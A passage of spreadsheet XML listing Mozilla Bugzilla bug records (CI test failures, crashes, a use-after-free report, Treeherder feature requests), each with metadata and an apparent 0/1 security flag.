        </is>
      </c>
      <c r="R3845" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3845" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T3845" t="n">
        <v>1</v>
      </c>
      <c r="U3845" t="n">
        <v>0</v>
      </c>
      <c r="V3845" t="n">
        <v>3</v>
      </c>
      <c r="W3845" t="inlineStr">
        <is>
          <t>**Filed by:** rmaries [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=316628517&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/CeJXKpiwTBe6a9rOZXrovw/runs/0/artifacts/public/logs/live_backing.log
---
```
[task 2020-09-24T19:43:19.961Z]  0:10.95 ============================= test session starts ==============================
[task 2020-09-24T19:43:19.961Z]  0:10.95 platform linux2 -- Python 2.7.17, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- /builds/worker/checkouts/gecko/obj-x86_64-pc-linux-gnu/_virtualenvs/python-test/bin/python
[task 2020-09-24T19:43:19.962Z]  0:10.95 rootdir: /builds/worker/checkouts/gecko, inifile: /builds/worker/checkouts/gecko/config/mozunit/mozunit/pytest.ini
[task 2020-09-24T19:43:19.962Z]  0:10.95 collecting ... collected 19 items
[task 2020-09-24T19:43:19.962Z]  0:10.95 
[task 2020-09-24T19:43:19.962Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_optimization_strategy[opt0-tasks0-None-expected0] PASSED
[task 2020-09-24T19:43:19.962Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_optimization_strategy[opt1-tasks1-None-expected1] PASSED
[task 2020-09-24T19:43:19.962Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_optimization_strategy[opt2-tasks2-arg2-expected2] PASSED
[task 2020-09-24T19:43:19.962Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_optimization_strategy[opt3-tasks3-arg3-expected3] PASSED
[task 2020-09-24T19:43:19.963Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_optimization_strategy[opt4-tasks4-arg4-expected4] PASSED
[task 2020-09-24T19:43:19.963Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_push_schedules[args0-data0-expected0] PASSED
[task 2020-09-24T19:43:19.963Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_push_schedules[args1-data1-expected1] PASSED
[task 2020-09-24T19:43:19.963Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_push_schedules[args2-data2-expected2] PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_push_schedules[args3-data3-expected3] PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_push_schedules[args4-data4-expected4] PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_push_schedules[args5-data5-expected5] PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_push_schedules[args6-data6-expected6] PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_multiple_pushes PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_timeout PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_bugbug_fallback PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_backstop PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_push_interval PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_expanded PASSED
[task 2020-09-24T19:43:19.964Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_project_autoland_test TEST-UNEXPECTED-FAIL
[task 2020-09-24T19:43:19.964Z]  0:10.95 
[task 2020-09-24T19:43:19.964Z]  0:10.95 =================================== FAILURES ===================================
[task 2020-09-24T19:43:19.964Z]  0:10.95 __________________________ test_project_autoland_test __________________________
[task 2020-09-24T19:43:19.965Z]  0:10.95 
[task 2020-09-24T19:43:19.966Z]  0:10.95 monkeypatch = &lt;_pytest.monkeypatch.MonkeyPatch object at 0x7fcc87d82890&gt;
[task 2020-09-24T19:43:19.966Z]  0:10.95 responses = &lt;responses.RequestsMock object at 0x7fcc87d82bd0&gt;
[task 2020-09-24T19:43:19.966Z]  0:10.95 params = {'backstop': False, 'branch': 'integration/autoland', 'head_repository': 'https://hg.mozilla.org/integration/autoland', 'head_rev': 'abcdef', ...}
[task 2020-09-24T19:43:19.966Z]  0:10.95 
[task 2020-09-24T19:43:19.966Z]  0:10.95     def test_project_autoland_test(monkeypatch, responses, params):
[task 2020-09-24T19:43:19.966Z]  0:10.95         """Tests the behaviour of the `project.autoland["test"]` strategy on
[task 2020-09-24T19:43:19.966Z]  0:10.95         various types of pushes.
[task 2020-09-24T19:43:19.966Z]  0:10.95         """
[task 2020-09-24T19:43:19.966Z]  0:10.95         # This is meant to test the composition of substrategies, and not the
[task 2020-09-24T19:43:19.966Z]  0:10.95         # actual optimization implementations. So mock them out for simplicity.
[task 2020-09-24T19:43:19.966Z]  0:10.95         monkeypatch.setattr(SkipUnlessSchedules, "should_remove_task", lambda *args: False)
[task 2020-09-24T19:43:19.967Z]  0:10.95         monkeypatch.setattr(DisperseGroups, "should_remove_task", lambda *args: False)
[task 2020-09-24T19:43:19.967Z]  0:10.95 
[task 2020-09-24T19:43:19.967Z]  0:10.95         def fake_bugbug_should_remove_task(self, task, params, importance):
[task 2020-09-24T19:43:19.967Z]  0:10.95             if self.num_pushes &gt; 1:
[task 2020-09-24T19:43:19.967Z]  0:10.95                 return task.label == "task-4"
[task 2020-09-24T19:43:19.967Z]  0:10.95             return task.label in ("task-2", "task-3", "task-4")
[task 2020-09-24T19:43:19.967Z]  0:10.95 
[task 2020-09-24T19:43:19.967Z]  0:10.95         monkeypatch.setattr(BugBugPushSchedules, "should_remove_task", fake_bugbug_should_remove_task)
[task 2020-09-24T19:43:19.967Z]  0:10.95 
[task 2020-09-24T19:43:19.967Z]  0:10.95         opt = project.autoland['test']
[task 2020-09-24T19:43:19.967Z]  0:10.95 
[task 2020-09-24T19:43:19.967Z]  0:10.95         # On backstop pushes, nothing gets optimized.
[task 2020-09-24T19:43:19.967Z]  0:10.95         params['backstop'] = True
[task 2020-09-24T19:43:19.967Z]  0:10.95         scheduled = {t.label for t in default_tasks if not opt.should_remove_task(t, params, {})}
[task 2020-09-24T19:43:19.967Z]  0:10.95         assert scheduled == {t.label for t in default_tasks}
[task 2020-09-24T19:43:19.968Z]  0:10.95 
[task 2020-09-24T19:43:19.968Z]  0:10.95         # On expanded pushes, some things are optimized.
[task 2020-09-24T19:43:19.968Z]  0:10.95         params['backstop'] = False
[task 2020-09-24T19:43:19.968Z]  0:10.95         params['pushlog_id'] = 10
[task 2020-09-24T19:43:19.968Z]  0:10.95 &gt;       scheduled = {t.label for t in default_tasks if not opt.should_remove_task(t, params, {})}
[task 2020-09-24T19:43:19.968Z]  0:10.95 
[task 2020-09-24T19:43:19.968Z]  0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py:386:```</t>
        </is>
      </c>
      <c r="X3845" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3846">
      <c r="A3846" t="n">
        <v>1343049</v>
      </c>
      <c r="B3846" t="inlineStr">
        <is>
          <t>2017-02-27 13:56:51 -0800</t>
        </is>
      </c>
      <c r="C3846" t="inlineStr">
        <is>
          <t>The OS theme isn't consistent on Windows 7 test machines</t>
        </is>
      </c>
      <c r="D3846" t="inlineStr">
        <is>
          <t>2019-02-08 13:18:53 -0800</t>
        </is>
      </c>
      <c r="E3846" t="n">
        <v>1</v>
      </c>
      <c r="F3846" t="n">
        <v>1</v>
      </c>
      <c r="G3846" t="n">
        <v>5</v>
      </c>
      <c r="H3846" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3846" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J3846" t="inlineStr">
        <is>
          <t>Workers</t>
        </is>
      </c>
      <c r="K3846" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3846" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3846" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3846" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3846" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3846" t="inlineStr"/>
      <c r="Q3846" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3846" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3846" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3846" t="n">
        <v>1</v>
      </c>
      <c r="U3846" t="n">
        <v>0</v>
      </c>
      <c r="V3846" t="n">
        <v>113</v>
      </c>
      <c r="W3846" t="inlineStr">
        <is>
          <t>Some machines seem to use Aero Glass while others use Aero Basic. Not only does this change the apeparance of the window chrome, it also seems to also affect the font rendering and I suspect causes intermittent failures e.g. on reftests. For mozscreenshots this causes false changes to be reported since the window chrome is intentionally captured.
What's the best way to proceed?
Is the OS automatically switching to the basic theme due to its heuristics or is something else causing this?
If not, should I expect a more consistent OS theme on TaskCluster if I move M(ss) jobs to it from BB?
Can we force the OS theme back to Aero Glass regularly or set some registry key(s) so the OS doesn't automatically switch this stuff?</t>
        </is>
      </c>
      <c r="X3846" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3847">
      <c r="A3847" t="n">
        <v>378027</v>
      </c>
      <c r="B3847" t="inlineStr">
        <is>
          <t>2007-04-19 07:03:46 -0700</t>
        </is>
      </c>
      <c r="C3847" t="inlineStr">
        <is>
          <t>Printing crash [@ nsCellMap::GetCellInfoAt] Exception: EXC_BAD_INSTRUCTION (0x0002)</t>
        </is>
      </c>
      <c r="D3847" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E3847" t="n">
        <v>1</v>
      </c>
      <c r="F3847" t="n">
        <v>1</v>
      </c>
      <c r="G3847" t="n">
        <v>3</v>
      </c>
      <c r="H3847" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3847" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3847" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K3847" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3847" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3847" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3847" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3847" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3847" t="inlineStr">
        <is>
          <t>[sg:moderate?][needs patch] using freed frame</t>
        </is>
      </c>
      <c r="Q3847" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3847" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3847" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3847" t="n">
        <v>1</v>
      </c>
      <c r="U3847" t="n">
        <v>0</v>
      </c>
      <c r="V3847" t="n">
        <v>31</v>
      </c>
      <c r="W3847" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Firefox crashes every time with an EXC_BAD_INSTRUCTION exception when trying to print a particular page from Intuit.com; a product order page.  The original page is from intuit.com.  A web complete source page and supporting images,etc are attached to this bug.  The crash is 100% reproducible with this page content on MacOS X 10.4.9 with Firefox 2.0.0.3 (20070309).
Reproducible: Always
Steps to Reproduce:
1. Using Firefox 2.0.0.3 (20070309)...
2. Open the attached 'edit_confirmation.html' file.
3. Once open, click on the 'Print this page' icon/link on the page.
4. When the OS print dialog comes up, select 'Print'
Actual Results:  
Firefox crashes after you have clicked 'Print' and the print dialog has been dismissed.
Exception:  EXC_BAD_INSTRUCTION (0x0002)
Expected Results:  
Firefox should successfully print the page.
This sample page content prints fine on Windows Vista with Firefox 2.0.0.3 (20070309).  Attached is a sample 'order_confirmation.xps' of the page output from Windows Vista.</t>
        </is>
      </c>
      <c r="X3847" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3848">
      <c r="A3848" t="n">
        <v>1060763</v>
      </c>
      <c r="B3848" t="inlineStr">
        <is>
          <t>2014-08-30 04:30:23 -0700</t>
        </is>
      </c>
      <c r="C3848" t="inlineStr">
        <is>
          <t>Update job names to match new additions to TBPL</t>
        </is>
      </c>
      <c r="D3848" t="inlineStr">
        <is>
          <t>2014-09-02 11:29:26 -0700</t>
        </is>
      </c>
      <c r="E3848" t="n">
        <v>1</v>
      </c>
      <c r="F3848" t="n">
        <v>1</v>
      </c>
      <c r="G3848" t="n">
        <v>7</v>
      </c>
      <c r="H3848" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3848" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3848" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3848" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3848" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3848" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3848" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3848" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3848" t="inlineStr"/>
      <c r="Q3848" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3848" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3848" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3848" t="n">
        <v>1</v>
      </c>
      <c r="U3848" t="n">
        <v>0</v>
      </c>
      <c r="V3848" t="n">
        <v>4</v>
      </c>
      <c r="W3848" t="inlineStr">
        <is>
          <t>Broken out from bug 1040418.
The job types need updating in:
https://github.com/mozilla/treeherder-service/blob/master/treeherder/etl/buildbot.py</t>
        </is>
      </c>
      <c r="X3848" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3849">
      <c r="A3849" t="n">
        <v>1670358</v>
      </c>
      <c r="B3849" t="inlineStr">
        <is>
          <t>2020-10-09 18:14:05 -0700</t>
        </is>
      </c>
      <c r="C3849" t="inlineStr">
        <is>
          <t>Calling Compact on a nsTArray will lead to use-after-free error in JS_GC because of the reallocation</t>
        </is>
      </c>
      <c r="D3849" t="inlineStr">
        <is>
          <t>2024-05-30 10:19:41 -0700</t>
        </is>
      </c>
      <c r="E3849" t="n">
        <v>1</v>
      </c>
      <c r="F3849" t="n">
        <v>1</v>
      </c>
      <c r="G3849" t="n">
        <v>3</v>
      </c>
      <c r="H3849" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3849" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3849" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K3849" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3849" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3849" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3849" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3849" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3849" t="inlineStr">
        <is>
          <t>[adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q3849" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3849" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3849" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T3849" t="n">
        <v>1</v>
      </c>
      <c r="U3849" t="n">
        <v>0</v>
      </c>
      <c r="V3849" t="n">
        <v>15</v>
      </c>
      <c r="W3849" t="inlineStr">
        <is>
          <t>Created attachment 9180814
test_and_output.zip
# Version
```
commit	62c443a7c801ba9672de34c2867ec1665a4bbe67
parent	b2dee52fd392f7130bc3858a70c683faa773aa8f
hg	48f10c4139655c2c4d52fa773f1fd760ea681d42
git	62c443a7c801ba9672de34c2867ec1665a4bbe67
author	Gijs Kruitbosch &lt;gijskruitbosch@gmail.com&gt;
committer	Gijs Kruitbosch &lt;gijskruitbosch@gmail.com&gt;
commit time	Fri, 11 Sep 2020 15:05:50 +0000
```
# Steps to reproduce 
  - Enable address sanitizer in mozconfig.
  - In [TestGCPostBarriers.cpp](https://searchfox.org/mozilla-central/source/xpcom/tests/gtest/TestGCPostBarriers.cpp),
add `array-&gt;Compact()` after [line 58](https://searchfox.org/mozilla-central/source/xpcom/tests/gtest/TestGCPostBarriers.cpp#58) and before [line 64](https://searchfox.org/mozilla-central/source/xpcom/tests/gtest/TestGCPostBarriers.cpp#64)
  - run the gtest with `./mach gtest GCPostBarriers.nsTArray`
# More details
The key intuition is that the added `Compact` will cause the array to reallocate
and trying to access array items using an old address will lead to use-after-free error.
We came across this when we were working on something similar to a [ChaosMode](https://searchfox.org/mozilla-central/source/mfbt/ChaosMode.h) feature where we wanted to make array reallocation happen more often.
---
We have attached a test file with some print statements and the output file.
Our output file shows that the error happens when `RunTest` is first called with a `nsTArray` at [line 96](https://searchfox.org/mozilla-central/source/xpcom/tests/gtest/TestGCPostBarriers.cpp#95-96).
Our output file also shows that reallocation happened several times in the loop [line 52-58](https://searchfox.org/mozilla-central/source/xpcom/tests/gtest/TestGCPostBarriers.cpp#52-58),
which indicates that the extra reallocation triggered by `Compact` should not
affect later code.
Before being populated, the array was passed to `JS_AddExtraGCRootsTracer`
together with `TraceArray` at [line 44](https://searchfox.org/mozilla-central/source/xpcom/tests/gtest/TestGCPostBarriers.cpp#44).
In `TraceArray`, we found an unsafe use of addresses of array items.
```
template &lt;class ArrayT&gt;
static void TraceArray(JSTracer* trc, void* data) {
  ArrayT* array = static_cast&lt;ArrayT*&gt;(data);
  for (unsigned i = 0; i &lt; array-&gt;Length(); ++i)
    JS::TraceEdge(trc, &amp;array-&gt;ElementAt(i), "array-element");
}
```
Here, `&amp;array-&gt;ElementAt(i)` will become an invalid address if the array gets reallocated.
We added a print statement in `TraceArray` but didn't see it in the output file.
This could mean that there are other similarly unsafe code in `JS_GC`.
We also dumped all the array addresses and saw that
the UAF read is accessing the address right before the last reallocation from `Compact`.
The UAF address is the last element in the array but we don't know if the last one
is different from other elements.
We think there might be unsafe use of array addresses in the GC code or
the way `Compact` reallocates array is problematic.</t>
        </is>
      </c>
      <c r="X3849" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3850">
      <c r="A3850" t="n">
        <v>1059352</v>
      </c>
      <c r="B3850" t="inlineStr">
        <is>
          <t>2014-08-27 08:27:41 -0700</t>
        </is>
      </c>
      <c r="C3850" t="inlineStr">
        <is>
          <t>Filters: Unable to quickfilter across multiple attributes eg "Linux talos"</t>
        </is>
      </c>
      <c r="D3850" t="inlineStr">
        <is>
          <t>2015-05-20 04:26:13 -0700</t>
        </is>
      </c>
      <c r="E3850" t="n">
        <v>1</v>
      </c>
      <c r="F3850" t="n">
        <v>1</v>
      </c>
      <c r="G3850" t="n">
        <v>7</v>
      </c>
      <c r="H3850" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3850" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3850" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3850" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3850" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3850" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3850" t="inlineStr"/>
      <c r="Q3850" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3850" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3850" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3850" t="n">
        <v>1</v>
      </c>
      <c r="U3850" t="n">
        <v>0</v>
      </c>
      <c r="V3850" t="n">
        <v>5</v>
      </c>
      <c r="W3850" t="inlineStr">
        <is>
          <t>In TBPL we could set a regex filter to allow for things like "Linux.*talos".
Neither "Linux talos" (for simple filtering based on whitespace) nor "Linux.*talos" works in treeherder. TBPL didn't support the former, but if that's easier to implement, then it might solve the problem well enough that regex support is unnecessary for now.</t>
        </is>
      </c>
      <c r="X3850" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3851">
      <c r="A3851" t="n">
        <v>854994</v>
      </c>
      <c r="B3851" t="inlineStr">
        <is>
          <t>2013-03-26 11:52:18 -0700</t>
        </is>
      </c>
      <c r="C3851" t="inlineStr">
        <is>
          <t>test failures on Firefox Android (release)</t>
        </is>
      </c>
      <c r="D3851" t="inlineStr">
        <is>
          <t>2013-08-06 14:21:06 -0700</t>
        </is>
      </c>
      <c r="E3851" t="n">
        <v>1</v>
      </c>
      <c r="F3851" t="n">
        <v>1</v>
      </c>
      <c r="G3851" t="n">
        <v>6</v>
      </c>
      <c r="H3851" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3851" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J3851" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3851" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3851" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3851" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3851" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3851" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3851" t="inlineStr"/>
      <c r="Q3851" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3851" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3851" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3851" t="n">
        <v>1</v>
      </c>
      <c r="U3851" t="n">
        <v>0</v>
      </c>
      <c r="V3851" t="n">
        <v>4</v>
      </c>
      <c r="W3851" t="inlineStr">
        <is>
          <t>Running `cfx test` on Firefox Android (release), ends with failures:
tests/test-tabs-common.testImmediateClosing: failure
tests/test-tabs-common.testPrivateAreNotListed: failure
And it said that "3696 of 3699 tests passed", so we're also missing one test.</t>
        </is>
      </c>
      <c r="X3851" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3852">
      <c r="A3852" t="n">
        <v>898832</v>
      </c>
      <c r="B3852" t="inlineStr">
        <is>
          <t>2013-07-28 01:48:17 -0700</t>
        </is>
      </c>
      <c r="C3852" t="inlineStr">
        <is>
          <t>crash in mozilla::dom::NodeBinding::get_childNodes</t>
        </is>
      </c>
      <c r="D3852" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3852" t="n">
        <v>1</v>
      </c>
      <c r="F3852" t="n">
        <v>1</v>
      </c>
      <c r="G3852" t="n">
        <v>3</v>
      </c>
      <c r="H3852" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3852" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3852" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3852" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L3852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3852" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3852" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3852" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q3852" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3852" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3852" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3852" t="n">
        <v>1</v>
      </c>
      <c r="U3852" t="n">
        <v>0</v>
      </c>
      <c r="V3852" t="n">
        <v>53</v>
      </c>
      <c r="W3852" t="inlineStr">
        <is>
          <t>It's #48 browser crasher in 23.0b8 and #15 in the first day of 23.0b9.
Using mozregression, the regression range is:
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=b980d32c366f&amp;tochange=ea059733677c
and the working range is:
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=d2a7cfa34154&amp;tochange=8ea92aeab783
It might be fixed by bug 884401's patch.
Signature 	mozilla::dom::NodeBinding::get_childNodes More Reports Search
UUID 	e4aa87e5-24e7-4e0e-8da1-db5842130728
Date Processed	2013-07-28 08:05:27.125889
Uptime	22
Last Crash	27 seconds before submission
Install Age 	51551 since version was first installed.
Install Time 	2013-07-27 17:46:07
Product 	Firefox
Version 	23.0
Build ID 	20130725195523
Release Channel 	beta
OS 	Windows NT
OS Version 	6.1.7601 Service Pack 1
Build Architecture 	x86
Build Architecture Info 	GenuineIntel family 6 model 23 stepping 10 | 2
Crash Reason 	EXCEPTION_ACCESS_VIOLATION_EXEC
Crash Address 	0x12143c20
App Notes 	
AdapterVendorID: 0x8086, AdapterDeviceID: 0x2a42, AdapterSubsysID: 02051025, AdapterDriverVersion: 8.15.10.2202
D2D? D2D+ DWrite? DWrite+ D3D10 Layers? D3D10 Layers+ 
Frame 	Module 	Signature 	Source
0 		@0x12143c20 	
1 	xul.dll 	mozilla::dom::NodeBinding::get_childNodes 	obj-firefox/dom/bindings/NodeBinding.cpp
2 	mozjs.dll 	ToLowerCaseHelper 	js/src/jsstr.cpp
3 		@0x1 	
4 		@0x1f8c03bc
More reports at:
https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=mozilla%3A%3Adom%3A%3ANodeBinding%3A%3Aget_childNodes</t>
        </is>
      </c>
      <c r="X3852" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3853">
      <c r="A3853" t="n">
        <v>756241</v>
      </c>
      <c r="B3853" t="inlineStr">
        <is>
          <t>2012-05-17 13:21:40 -0700</t>
        </is>
      </c>
      <c r="C3853" t="inlineStr">
        <is>
          <t>Heap-use-after-free READ 8 in gfxTextRun::GetUserData</t>
        </is>
      </c>
      <c r="D3853" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:10 -0700</t>
        </is>
      </c>
      <c r="E3853" t="n">
        <v>1</v>
      </c>
      <c r="F3853" t="n">
        <v>1</v>
      </c>
      <c r="G3853" t="n">
        <v>3</v>
      </c>
      <c r="H3853" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3853" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3853" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3853" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3853" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3853" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3853" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3853" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3853" t="inlineStr">
        <is>
          <t>[sg:critical][asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3853" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3853" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3853" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3853" t="n">
        <v>1</v>
      </c>
      <c r="U3853" t="n">
        <v>0</v>
      </c>
      <c r="V3853" t="n">
        <v>20</v>
      </c>
      <c r="W3853" t="inlineStr">
        <is>
